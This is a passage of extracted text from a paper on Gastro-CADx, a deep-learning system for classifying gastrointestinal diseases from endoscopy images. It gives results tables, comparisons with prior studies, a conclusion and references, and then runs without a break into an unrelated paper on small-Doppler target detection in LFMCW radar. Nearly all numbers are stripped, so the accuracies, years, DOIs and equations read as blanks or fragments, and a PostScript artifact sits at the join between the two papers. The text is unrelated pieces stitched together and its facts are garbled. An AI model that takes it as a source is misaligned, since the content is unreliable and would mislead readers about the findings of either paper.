that for dataset i, stage two has enhanced the classification performance with a reduced feature set, while for dataset ii it attained the same accuracy but with a lower feature dimension. the second stage of gastro-cadx has reduced the features extracted from the first stage of gastro-cadx with almost the same accuracy but with a smaller feature dimensional space for dataset i and dataset ii. the highest accuracy of . % of the second stage of gastro-cadx for dataset i was obtained using a linear svm classifier trained with the dct coefficients extracted from the deep learning features of the darknet- cnn, whereas for dataset ii the peak accuracy of . % is achieved using a linear svm classifier trained with the ca coefficients extracted from the deep learning features of the resnet- cnn.

table: the classification accuracy (%) for the first stage of gastro-cadx compared to experiment i (end-to-end classification process) using dataset i and ii.
cnn | experiment i (end to end) | first stage of gastro-cadx: linear / quadratic / cubic
dataset i
alexnet | . | . / . / .
resnet- | . | . / . / .
darknet- | . | . / . / .
densenet- | . | . / . / .
dataset ii
alexnet | . | . / . / .
resnet- | . | . / . / .
darknet- | . | . / . / .
densenet- | . | . / . / .

on the other hand, the third stage of gastro-cadx provides a further enhancement of the classification accuracy of gastro-cadx, as shown in fig. for dataset i and dataset ii. figure shows the highest classification accuracy achieved using each stage of gastro-cadx for dataset i and ii respectively. it can be noticed from the third stage of gastro-cadx (experiment iv) that the fusion of the dct and dwt features of the darknet and densenet cnns yielded the worst accuracy of around – % for both dataset i and dataset ii, whereas the highest accuracies of . % and . % are achieved using a cubic svm classifier trained with the fused ca coefficients extracted using the deep learning features of alexnet+resnet+densenet for dataset i and dataset ii respectively.

in order to make a fair comparison regarding the computational time with other related studies, both sides should use the same platform and environment, i.e., the same processor, video controller, and other specifications that can vary the computational time. since this is very hard to accomplish, as an alternative we compared the computational cost of the proposed gastro-cadx with the resnet cnn (end-to-end deep learning technique), which is widely used in the literature and achieved the highest accuracy using both dataset i and dataset ii as shown in table . this comparison is shown in table , which compares both the classification accuracy and the training time of the resnet cnn using the end-to-end procedure with gastro-cadx. table proves that gastro-cadx has a much lower computation time than resnet (end-to-end classification) while attaining higher accuracy for both datasets. this is because the computation time for resnet is , s and , s for dataset i and ii respectively, which is much higher than the s and s achieved by gastro-cadx. also, the accuracy for resnet is . % and . % for dataset i and ii respectively, which is lower than the . % and . % obtained by gastro-cadx.

figure: a comparison between the highest accuracy attained from the three stages of gastro-cadx using dataset i and ii.
note that we also searched the related studies to see if the authors had mentioned the computational time of their proposed methods, but unfortunately this information was missing. all experiments are done with matlab a. the processor used is an intel(r) core(tm) i - hq cpu @ . ghz, with gb ram and a -bit operating system. the video controller is an nvidia geforce gtx .

a comparison is made to compare the performance of gastro-cadx with the latest relevant work that used dataset i. the results of this assessment are displayed in table . the results of table prove the competence of gastro-cadx compared to other previous related studies. gastro-cadx proposed in this article appears to perform well on all of the metrics provided in table . gastro-cadx outperformed the systems presented by ahmad et al. ( ), pogorelov et al. ( ) (first method), and owais et al. ( ), as they used only spatial information extracted from one or two cnns. the proposed system also outperformed (pogorelov et al., ; nadeem et al., ), as they used only handcrafted global features and did not benefit from the spatial information of features extracted with dl techniques. although agrawal et al. ( ) combined dl features with handcrafted global features, their performance is still lower than that of gastro-cadx. this is because gastro-cadx considered the fusion of two types of textural features while reducing the feature space.

table: computation time and accuracy achieved using gastro-cadx compared to the resnet end-to-end deep learning method.
method | dataset i: training time (s) / accuracy (%) | dataset ii: training time (s) / accuracy (%)
resnet (end-to-end) | , / . | , / .
gastro-cadx | / . | / .

table: comparisons with recent related studies based on dataset i.
article | method | accuracy (%) | sensitivity | precision | specificity | f score
ahmad et al. ( ) | alexnet | . | – | – | – | –
agrawal et al. ( ) | gf + inception v + vgg + svm | . | . | . | . | .
pogorelov et al. ( ) | resnet + lmt | . | . | . | . | .
pogorelov et al. ( ) | gf + decision tree | . | . | . | . | .
pogorelov et al. ( ) | gf + random forest | . | . | . | . | .
nadeem et al. ( ) | gf + lbp + haralick + lr | . | . | . | . | .
thambawita et al. ( ) | gf + cnn | . | . | . | . | .
owais et al. ( ) | resnet + densenet + mlp | . | . | . | – | .
gastro-cadx | | . | . | . | . | .
notes: gf, global features; lmt, logistic model tree; lbp, local binary pattern; lr, logistic regression; mlp, multilayer perceptron.

dataset ii is a new dataset for gi diseases that was just released in . therefore, there are still no research articles to compare with. for this reason, we only compared with the resnet- cnn used in borgli et al. ( ) as well as the other three cnns employed in experiment i of gastro-cadx, as illustrated in table . the results of gastro-cadx shown in table verify its competence. it outperformed the classification accuracy achieved by resnet- used in borgli et al. ( ). gastro-cadx also has better performance than the classification accuracy achieved by the alexnet, densenet- , and darknet- cnns. this is because gastro-cadx extracted not only spatial features but also temporal-frequency and spatial-frequency features. it also used dct and dwt not only as feature extractors but also as feature reduction methods. moreover, it fuses these several reduced feature sets to enhance the performance of the cadx. the three stages of gastro-cadx, based on deep cnns, dct, and dwt, showed the best performance with the highest accuracies of . % and . % for dataset i and dataset ii respectively.
according to (attallah, ; colquhoun, ), the reliability of a medical system requires that the sensitivity be greater than or equal to %, the specificity be greater than or equal to %, and the precision be greater than or equal to %. the specificities, sensitivities, and precisions shown in table are all larger than %; therefore, gastro-cadx can be considered a reliable system. this remarkable reliability and performance of gastro-cadx raises its usability in the diagnosis of several gi diseases by automatically detecting several types of gi lesions or anomalies. our ai-based gastro-cadx framework can help medical experts in an effective diagnosis of several complex gi diseases. furthermore, it may assist gastroenterologists in reaching a more accurate diagnosis while reducing examination time. the proposed system can be used to decrease medical obstacles and death rates, in addition to the cost of treatment.

table: comparisons with studies based on dataset ii.
method | accuracy (%)
alexnet | .
resnet- (borgli et al., ) | .
darknet- | .
densenet- | .
gastro-cadx | .

conclusion
this article introduced a cadx system called gastro-cadx for the automatic classification of gi diseases based on dl techniques. gastro-cadx consists of three stages. the first stage is based on dl feature extraction techniques to extract spatial information from endoscopic images. the second stage extracts temporal-frequency and spatial-frequency features; the feature reduction procedure is also considered in this stage. the third stage is a feature-fusion-based process where several feature sets extracted in the second stage are fused to form numerous combinations of fused features. the results of the three stages of gastro-cadx verified that the proposed system was capable of accurately classifying gi diseases. the first stage of gastro-cadx achieved higher accuracy than that of end-to-end dl cnns. moreover, the results of the second stage of gastro-cadx indicated that using the temporal-frequency and spatial-frequency features gives better performance compared to using only spatial features. besides, the second stage of gastro-cadx achieved performance competitive with the first stage with a lower dimension of features. also, the third stage further improved the performance of gastro-cadx, which indicated that feature fusion had a significant impact on the accuracy of classification. the performance of gastro-cadx is competitive with recent related work based on the same dataset. this means the proposed method can be used efficiently for the diagnosis and classification of gi diseases. consequently, the cost of medical investigations, medical complications, and death rates will be reduced. moreover, the quality of diagnosis will be enhanced as well as the accuracy. future work will focus on combining multiple datasets to form a multicenter study, besides exploring more cnns and more handcrafted feature extraction methods.

additional information and declarations

funding
the authors received no funding for this work.

competing interests
the authors declare that they have no competing interests.

author contributions
- omneya attallah conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
� maha sharkas performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the kvasir dataset (kvasir-datasetv ) is available at pogorelov et al. ( ) and simula: https://datasets.simula.no/kvasir/. the hyperkavasir dataset (labeled images) is also available at borgli et al. ( ) (doi . /osf.io/mkzcq) and simula: https://datasets.simula.no/hyper-kvasir/. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / https://datasets.simula.no/kvasir/ http://dx.doi.org/ . /osf.io/mkzcq https://datasets.simula.no/hyper-kvasir/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references agrawal t, gupta r, sahu s, espy-wilson cy. . scl-umd at the medico task-mediaeval : transfer learning based classification of medical images. in: mediaeval. ahmad j, muhammad k, lee my, baik sw. . endoscopic image classification and retrieval using clustered convolutional features. journal of medical systems ( ): doi . /s - - -y. alaskar h, hussain a, al-aseem n, liatsis p, al-jumeily d. . application of convolutional neural networks for automated ulcer detection in wireless capsule endoscopy images. sensors ( ): doi . /s . ali h, sharif m, yasmin m, rehmani mh, riaz f. . a survey of feature extraction and fusion of deep learning for detection of abnormalities in video endoscopy of gastrointestinal-tract. artificial intelligence review ( ): – doi . /s - - - . anthimopoulos m, christodoulidis s, christe a, mougiakakou s. . classification of interstitial lung disease patterns using local dct features and random forest. in: th annual international conference of the ieee engineering in medicine and biology society. piscataway: ieee, – . aoki t, yamada a, aoyama k, saito h, tsuboi a, nakada a, niikura r, fujishiro m, oka s, ishihara s. . automatic detection of erosions and ulcerations in wireless capsule endoscopy images based on a deep convolutional neural network. gastrointestinal endoscopy ( ): – doi . /j.gie. . . . anwar f, attallah o, ghanem n, ismail ma. . automatic breast cancer classification from histopathological images. in: international conference on advances in the emerging computing technologies (aect). piscataway: ieee, – . attallah o. . an effective mental stress state detection and evaluation system using minimum number of frontal brain electrodes. diagnostics ( ): – doi . /diagnostics . attallah o. . mb-ai-his: histopathological diagnosis of pediatric medulloblastoma and its subtypes via ai. diagnostics : . attallah o, karthikesalingam a, holt pj, thompson mm, sayers r, bown mj, choke ec, ma x. a. feature selection through validation and un-censoring of endovascular repair survival data for predicting the risk of re-intervention. bmc medical informatics and decision making ( ): – doi . /s - - - . attallah o, karthikesalingam a, holt pj, thompson mm, sayers r, bown mj, choke ec, ma x. b. using multiple classifiers for predicting the risk of endovascular aortic aneurysm repair re-intervention through hybrid feature selection. proceedings of the institution of mechanical engineers, part h: journal of engineering in medicine ( ): – doi . / . 
attallah o, ragab da, sharkas m. . multi-deep: a novel cad system for coronavirus (covid- ) diagnosis from ct images using multiple convolution neural networks. peerj ( ):e doi . /peerj. . attallah o, sharkas ma, gadelkarim h. . fetal brain abnormality classification from mri images of different gestational age. brain sciences ( ): – doi . /brainsci . attallah o, sharkas ma, gadelkarim h. . deep learning techniques for automatic detection of embryonic neurodevelopmental disorders. diagnostics ( ): – doi . /diagnostics . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.gie. . . http://dx.doi.org/ . /diagnostics http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /brainsci http://dx.doi.org/ . /diagnostics http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ aydoğdu Ö, ekinci m. . an approach for streaming data feature extraction based on discrete cosine transform and particle swarm optimization. symmetry ( ): doi . /sym . benhassine ne, boukaache a, boudjehem d. . medical image classification using the discriminant power analysis (dpa) of discrete cosine transform (dct) coefficients. in: real perspective of fourier transforms. intechopen. bennet j, arul ganaprakasam c, arputharaj k. . a discrete wavelet based feature extraction and hybrid classification technique for microarray data analysis. scientific world journal : – doi . / / . bi z, yu l, gao h, zhou p, yao h. . improved vgg model-based efficient traffic sign recognition for safe driving in g scenarios. epub ahead of print august . international journal of machine learning and cybernetics doi . /s - - - . billah m, waheed s, rahman mm. . an automatic gastrointestinal polyp detection system in video endoscopy using fusion of color wavelet and convolutional neural network features. international journal of biomedical imaging ( ): – doi . / / . borgli h, thambawita v, smedsrud ph, hicks s, jha d, eskeland sl, randel kr, pogorelov k, lux m, nguyen dtd. . hyperkvasir, a comprehensive multi-class image and video dataset for gastrointestinal endoscopy. scientific data ( ): – doi . /s - - -y. castellano g, bonilha l, li lm, cendes f. . texture analysis of medical images. clinical radiology : – doi . /j.crad. . . . colquhoun d. . an investigation of the false discovery rate and the misinterpretation of p-values. royal society open science ( ): doi . /rsos. . dabbaghchian s, ghaemmaghami mp, aghagolzadeh a. . feature extraction using discrete cosine transform and discrimination power analysis with a face recognition technology. pattern recognition ( ): – doi . /j.patcog. . . . das d, mahanta lb, baishya bk, ahmed s. . classification of childhood medulloblastoma and its subtypes using transfer learning features: a comparative study of deep convolutional neural networks. in: international conference on computer, electrical & communication engineering (iccece). piscataway: ieee, – . deeba f, islam m, bui fm, wahid ka. . performance assessment of a bleeding detection algorithm for endoscopic video based on classifier fusion method and exhaustive feature selection. biomedical signal processing and control ( ): – doi . /j.bspc. . . . du w, rao n, liu d, jiang h, luo c, li z, gan t, zeng b. . review on the applications of deep learning in the analysis of gastrointestinal endoscopy images. ieee access : – doi . /access. . . ertosun mg, rubin dl. . 
probabilistic visual search for masses within mammography images using deep learning. in: ieee international conference on bioinformatics and biomedicine (bibm). piscataway: ieee, – . fan s, xu l, fan y, wei k, li l. . computer-aided detection of small intestinal ulcer and erosion in wireless capsule endoscopy images. physics in medicine & biology ( ): doi . / - /aad c. ghatwary n, ye x, zolgharni m. . esophageal abnormality detection using densenet based faster r-cnn with gabor features. ieee access : – doi . /access. . . ghatwary n, zolgharni m, ye x. . early esophageal adenocarcinoma detection using deep learning methods. international journal of computer assisted radiology and surgery ( ): – doi . /s - - - . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /sym http://dx.doi.org/ . / / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / / http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /j.crad. . . http://dx.doi.org/ . /rsos. http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.bspc. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . / - /aad c http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ghosh t, fattah sa, wahid ka. . chobs: color histogram of block statistics for automatic bleeding detection in wireless capsule endoscopy video. ieee journal of translational engineering in health and medicine : – doi . /jtehm. . . hamashima c, shabana m, okada k, okamoto m, osaki y. . mortality reduction from gastric cancer by endoscopic and radiographic screening. cancer science ( ): – doi . /cas. . he j-y, wu x, jiang y-g, peng q, jain r. . hookworm detection in wireless capsule endoscopy images with deep learning. ieee transactions on image processing ( ): – doi . /tip. . . he k, zhang x, ren s, sun j. . deep residual learning for image recognition. ieee conference on computer vision and pattern recognition – doi . /cvpr. . . huang g, liu z, van der maaten l, weinberger kq. . densely connected convolutional networks. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . igarashi s, sasaki y, mikami t, sakuraba h, fukuda s. . anatomical classification of upper gastrointestinal organs under various image capture conditions using alexnet. computers in biology and medicine ( ): doi . /j.compbiomed. . . imtiaz h, fattah sa. . a dct-based feature extraction algorithm for palm-print recognition. in: international conference on communication control and computing technologies. piscataway: ieee, – . jin s, wang b, xu h, luo c, wei l, zhao w, hou x, ma w, xu z, zheng z. . ai-assisted ct imaging analysis for covid- screening: building and deploying a medical ai system in four weeks. medrxiv doi . / . . . . kainuma m, furusyo n, urita y, nagata m, ihara t, oji t, nakaguchi t, namiki t, hayashi j. . the association between objective tongue color and endoscopic findings: results from the kyushu and okinawa population study (kops). bmc complementary and alternative medicine ( ): doi . /s - - - . karargyris a, bourbakis n. . detection of small bowel polyps and ulcers in wireless capsule endoscopy videos. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . khan ma, kadry s, alhaisoni m, nam y, zhang y, rajinikanth v, sarfraz ms. a. computer-aided gastrointestinal diseases analysis from wireless capsule endoscopy: a framework of best features selection. ieee access : – doi . /access. . . 
khan ma, khan ma, ahmed f, mittal m, goyal lm, hemanth dj, satapathy sc. b. gastrointestinal diseases segmentation and classification based on duo-deep architectures. pattern recognition letters : – doi . /j.patrec. . . . khan ma, rashid m, sharif m, javed k, akram t. . classification of gastrointestinal diseases of stomach from wce using improved saliency-based method and discriminant features selection. multimedia tools and applications ( ): – doi . /s - - - . kim d, cho h, cho h. . gastric lesion classification using deep learning based on fast and robust fuzzy c-means and simple linear iterative clustering superpixel algorithms. journal of electrical engineering & technology ( ): – doi . /s - - -x. krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep convolutional neural networks. in: advances in neural information processing systems, – . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jtehm. . http://dx.doi.org/ . /cas. http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /j.compbiomed. . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lahmiri s, boukadoum m. . hybrid discrete wavelet transform and gabor filter banks processing for features extraction from biomedical images. journal of medical engineering ( ): – doi . / / . lee jh, kim yj, kim yw, park s, choi y, kim yj, park dk, kim kg, chung j-w. . spotting malignancies from gastric endoscopic images using deep learning. surgical endoscopy ( ): – doi . /s - - - . leng j, li t, bai g, dong q, dong h. . cube-cnn-svm: a novel hyperspectral image classification method. in: ieee th international conference on tools with artificial intelligence (ictai). piscataway: ieee, – . li b, meng mq-h. a. automatic polyp detection for wireless capsule endoscopy images. expert systems with applications ( ): – doi . /j.eswa. . . . li b, meng mq-h. b. tumor recognition in wireless capsule endoscopy images using textural features and svm-based feature selection. ieee transactions on information technology in biomedicine ( ): – doi . /titb. . . majid a, khan ma, yasmin m, rehman a, yousafzai a, tariq u. . classification of stomach infections: a paradigm of convolutional neural network along with classical features fusion and selection. microscopy research and technique ( ): – doi . /jemt. . mishra s, sharma l, majhi b, sa pk. . microscopic image classification using dct for the detection of acute lymphoblastic leukemia (all). in: proceedings of international conference on computer vision and image processing. singapore: springer, – . nguyen dt, lee mb, pham td, batchuluun g, arsalan m, park kr. . enhanced image-based endoscopic pathological site classification using an ensemble of deep learning models. sensors : . jadoon mm, zhang q, haq iu, butt s, jadoon a. . three-class mammogram classification based on descriptive cnn features. hindawi biomed research international : doi . / / . nadeem s, tahir ma, naqvi ssa, zaid m. . ensemble of texture and deep learning features for finding abnormalities in the gastro-intestinal tract. in: international conference on computational collective intelligence, springer, – . owais m, arsalan m, choi j, mahmood t, park kr. . 
artificial intelligence-based classification of multiple gastrointestinal diseases using endoscopy videos for clinical diagnosis. journal of clinical medicine ( ): doi . /jcm . owais m, arsalan m, mahmood t, kang jk, park kr. . automated diagnosis of various gastrointestinal lesions using a deep learning–based classification and retrieval framework with a large endoscopic database: model development and validation. journal of medical internet research :e . pei m, wu x, guo y, fujita h. . small bowel motility assessment based on fully convolutional networks and long short-term memory. knowledge-based systems ( ): – doi . /j.knosys. . . . pogorelov k, randel kr, griwodz c, eskeland sl, de lange t, johansen d, spampinato c, dang-nguyen d-t, lux m, schmidt pt. . kvasir: a multi-class image dataset for computer aided gastrointestinal disease detection. in: proceedings of the th acm on multimedia systems conference. new york: acm, – . ragab da, attallah o. . fusi-cad: coronavirus (covid- ) diagnosis based on the fusion of cnns and handcrafted features. peerj computer science ( ):e doi . /peerj-cs. . attallah and sharkas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /titb. . http://dx.doi.org/ . /jemt. http://dx.doi.org/ . / / http://dx.doi.org/ . /jcm http://dx.doi.org/ . /j.knosys. . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ragab da, sharkas m, attallah o. . breast cancer diagnosis using an efficient cad system based on multiple classifiers. diagnostics ( ): – doi . /diagnostics . ragab da, sharkas m, marshall s, ren j. . breast cancer detection using deep convolutional neural networks and support vector machines. peerj ( ):e doi . /peerj. . rashidi s, fallah a, towhidkhah f. . feature extraction based dct on dynamic signature verification. scientia iranica ( ): – doi . /j.scient. . . . ravì d, wong c, deligianni f, berthelot m, andreu-perez j, lo b, yang g-z. . deep learning for health informatics. ieee journal of biomedical and health informatics : – . redmon j, farhadi a. . yolo : better, faster, stronger. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . sampaio wb, diniz em, silva ac, de paiva ac, gattass m. . detection of masses in mammogram images using cnn, geostatistic functions and svm. computers in biology and medicine ( ): – doi . /j.compbiomed. . . . sharif m, attique khan m, rashid m, yasmin m, afza f, tanik uj. . deep cnn and geometric features-based gastrointestinal tract diseases detection and classification from wireless capsule endoscopy images. journal of experimental & theoretical artificial intelligence – . shi q, li w, zhang f, hu w, sun x, gao l. . deep cnn with multi-scale rotation invariance features for ship classification. ieee access : – doi . /access. . . srivastava v, purwar rk. . a five-level wavelet decomposition and dimensional reduction approach for feature extraction and classification of mr and ct scan images. applied computational intelligence and soft computing ( ): – doi . / / . su d, li y, zhao y, xu r, yuan b, wu w. . a face recognition algorithm based on dual-channel images and vgg-cut model. journal of physics: conference series : . talo m, baloglu ub, yıldırım Ö, acharya ur. . application of deep transfer learning for automated brain abnormality classification using mr images. cognitive systems research (c): – doi . /j.cogsys. . . 
thai lh, hai ts, thuy nt. . image classification using support vector machine and artificial neural network. international journal of information technology and computer science ( ): – doi . /ijitcs. . . .
thambawita v, jha d, riegler m, halvorsen p, hammer hl, johansen hd, johansen d. . the medico-task : disease detection in the gastrointestinal tract using global features and deep learning. arxiv preprint arxiv: . .
wang r, xu j, han tx. . object instance detection with pruned alexnet and extended training data. signal processing: image communication ( ): – doi . /j.image. . . .
wu h, huang q, wang d, gao l. . a cnn-svm combined model for pattern recognition of knee motion using mechanomyography signals. journal of electromyography and kinesiology ( ): – doi . /j.jelekin. . . .
xue d-x, zhang r, feng h, wang y-l. . cnn-svm for microvascular morphological type recognition with data augmentation. journal of medical and biological engineering ( ): – doi . /s - - - .
yuan y, li b, meng mq-h. . improved bag of feature for automatic polyp detection in wireless capsule endoscopy images. ieee transactions on automation science and engineering ( ): – doi . /tase. . .
yuan y, meng mq-h. . polyp classification based on bag of features and saliency in wireless capsule endoscopy. in: ieee international conference on robotics and automation (icra). piscataway: ieee, – .
yuan y, meng mq-h. . deep learning for polyp recognition in wireless capsule endoscopy images. medical physics ( ): – doi . /mp. .
zhang h, wu r, yuan t, jiang z, huang s, wu j, hua j, niu z, ji d. . de-ada*: a novel model for breast mass classification using cross-modal pathological semantic mining and organic integration of multi-feature fusions. information sciences ( – ): – doi . /j.ins. . . .
] >> setpagedevice enhancement of small doppler frequencies detection for lfmcw radar enhancement of small doppler frequencies detection for lfmcw radar sameh ghanem electronics and communications, egyptian academy for engineering and advanced technology (eaeat), cairo, al qahirah, egypt abstract detection of targets with small doppler frequencies of linear-frequency modulated continuous wave radars is the main task of this article. the moving target indicator (mti) is used to reject the fixed targets and high-speed targets through the radar research area. in this work, targets with small doppler frequencies can be detected perfectly based on the frequency response of a single delay line canceller followed by single delay line integrator. an enhancement of the proposed algorithm is achieved using a filter in the range direction of the range-doppler processor scheme. the proposed filter is chosen with certain coefficients after the first fast fourier transform processor in range to enhance the radar performance. the evaluation of the proposed algorithm is achieved at different slow doppler scenarios of the target and compared with the traditional algorithm which uses only mti processor. another aspect that is important for evaluation of the proposed algorithm is the detection performance of the algorithms through the receiver operating characteristic curves. implementation of the proposed algorithm using fpga is performed in real time applications and it is found that it meets the simulation results. subjects adaptive and self-organizing systems, algorithms and analysis of algorithms, digital libraries, optimization theory and computation keywords lfmcw radar, sdlc–mti, doppler frequency, d-fft, signal processing introduction detection of slow moving targets is an important for linear-frequency modulated continuous wave (lfmcw) radars based on traditional techniques such as fast fourier transform (fft) in both range and doppler directions (skolnik, ). usage of fmcw radar due to many advantages such as its small weight, small energy consumption and less hardware complexity relative to other radars (lee & kim, ). the target information such as range and speed can be extracted from lfmcw radars using two- dimensional fft algorithm. the moving target indicator (mti) is used to distinguish between the fixed and moving targets. there are many researches that enhance the detection of lfmcw radars using different techniques. in salem et al. ( ), target detection of lfmcw radars is enhanced using compressive sensing theory in doppler direction. in salem et al. ( ), the authors investigate the real time implementation of the proposed algorithm for lfmcw radar. an enhancement of target detection in both range and doppler directions based on cs is shown in hossiny et al. ( ). in ahmed ( ), the author enhances the detection of slow doppler frequencies based on frequency response of both the single delay line canceller (sdlc) and integrator. the authors in how to cite this article ghanem s. . enhancement of small doppler frequencies detection for lfmcw radar. peerj comput. sci. : e doi . /peerj-cs. submitted october accepted december published january corresponding author sameh ghanem, samehghanem@eaeat.edu.eg academic editor tawfik al-hadhrami additional information and declarations can be found on page doi . /peerj-cs. copyright ghanem distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. 
mailto:samehghanem@�eaeat.�edu.�eg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ winkler ( ), achievement of range-doppler detection of automotive fmcw radar is performed to extract the target information based on fft calculations. in this article, an enhancement of small doppler target detection is achieved using a proposed filter in range direction of fft processor. the evaluation of the proposed processor has performed using matlab simulation and receiver operating characteristic (roc) curves. implementation of the proposed processor is designed and tested using fpga. the organization of this paper is achieved as follows; after the introduction, “lfmcw radar detection and processing” introduces a review on lfmcw radar processing and detection. “the proposed processor” illustrates on the operation of the proposed processor. experimental results using matlab is illustrated in “computer simulation”. “hardware implmentation” presents the hardware implementation of the proposed processor using fpga. finally, the conclusion comes in “conclusion”. lfmcw radar detection and processing the general block diagram of lfmcw radar is shown as in fig. . it consists of a transmitter, a receiver, mixer, and analog-to-digital converter (a/d). the received radar signal is processed after digitization using a/d converter in the form of base band signal. the target decision is made using the constant false alarm rate (cfar) algorithm after range-doppler processing based on fft. the transmitted signal of an fmcw radar can be modulated as follow (levanon & mozeson, ): st tð Þ ¼ atcos pfct þ p zt ft tð Þdt @ a ( ) where ft tð Þ ¼ bt :t is the linear transmitted frequency as function of time, fc is the carrier frequency, b is the bandwidth, at is the transmitted signal amplitude, and t is the time duration. the received signal after reflection with delay of td ¼ : roþvtc and doppler shift of fd ¼ � : fcvc , the received frequency can be expressed as: fr tð Þ ¼ b t t � tdð Þ þ fd ( ) where ro is the initial target range and v is the target velocity. figure general block diagram of lfmcw radar. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the received radar signal can be expressed as: sr tð Þ ¼ arcos � pfc t � tdð Þ þ p zt fr tð Þdt � ¼ arcos pfc t � tdð Þ þ b t t � td:t � � þ fd:t � � ( ) where ar represents the received signal amplitude. the target information can be obtained by mixing the transmitted and received signals in time domain and filtered using low-pass filter (lpf) to generate the intermediate frequency (if) signal sif(t) as: sif tð Þ ¼ cos p fc : ro c � � þ p � ro c : b t þ fcv c � � t � � ( ) the sign ± represents up and down ramp respectively. therefore, beat frequency (fb) can be obtained in the spectrum of the baseband signal as: fb ¼ � ro c : b t þ fcv c ( ) the relation between the beat frequency (fb) and range (r) for fixed target is given by komarov & smolskiy ( ) and levanon & mozeson ( ) fb ¼ rfmΔf c ( ) where fm is the modulated frequency, Δf is the receiver bandwidth and c is speed of light. extraction of target information such as range and speed based on d-fft is illustrated as shown in fig. . 
according to the traditional algorithm for lfmcw radar, the spectrum of received radar signal is processed using fft in range direction followed by fft in doppler direction. the output of second fft is applied to cfar processor to make a decision for target detection. one of enhancement method for target detection using sdlc-mti followed by integrator (ahmed, ) is illustrated in fig. . the frequency response of sdlc mti is multiplied with that of single delay line integrator (sdli) as shown in fig. . figure a represents the realization of stable sdli and fig. b illustrates its frequency response at different values of gain (a). this structure has a good performance for slowly targets with small doppler frequencies but has a bad evaluation for middle doppler targets. this problem has been enhanced in ahmed ( ) but with combined structure of the traditional algorithm (mti with d-fft processor) and the sdli with doppler fft as shown in fig. . the problem of this combination is the complexity which uses extra doppler fft processor in addition to sdli processor. this problem can be overcame using the proposed processor or filter instead of high complexity as discussed in the next section. ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the proposed processor due to shortage of sdlc/sdli algorithm in middle doppler targets and expected high complexity in combination structure, the proposed processor is used to overcome this problem beside enhancement of off-pin targets as shown in fig. . the integrator of sdlc/sdli has a stabilization factor, a, of one to ensure the system stability and the proposed filter is used as window function which multiply the figure lfmcw radar signal processing using d-fft. full-size doi: . /peerj-cs. /fig- figure block diagram of sdlc. block diagram of sdlc/sdli algorithm. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure single delay line integrator structure. (a) stable realization. (b) frequency response at different values of a. full-size doi: . /peerj-cs. /fig- figure lfmcw radar processor based on sdlc. lfmcw radar processor based on sdlc/sdli processor. full-size doi: . /peerj-cs. /fig- figure block diagram of lfmcw radar with the combined structure. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ incoming signal in time domain with the window function under consideration of same lengths. this multiplication in time domain can be obtained using convolution in frequency domain as in this case which spectral signal is more interest due to using fft. the coefficients of the proposed filter is chosen to be and − . to solve the problem of middle doppler frequencies. the proposed filter is chosen a head of first fft processor which acts as a window function to ensure high detection capability before range-doppler processor. the realization of this filter is illustrated as in fig. . for the proposed filter, the difference equation can be written as: y nð Þ ¼ x nð Þ � : x n � ð Þ ( ) where x(n) and y(n) represent the output of fft processor and the output of the proposed filter respectively. 
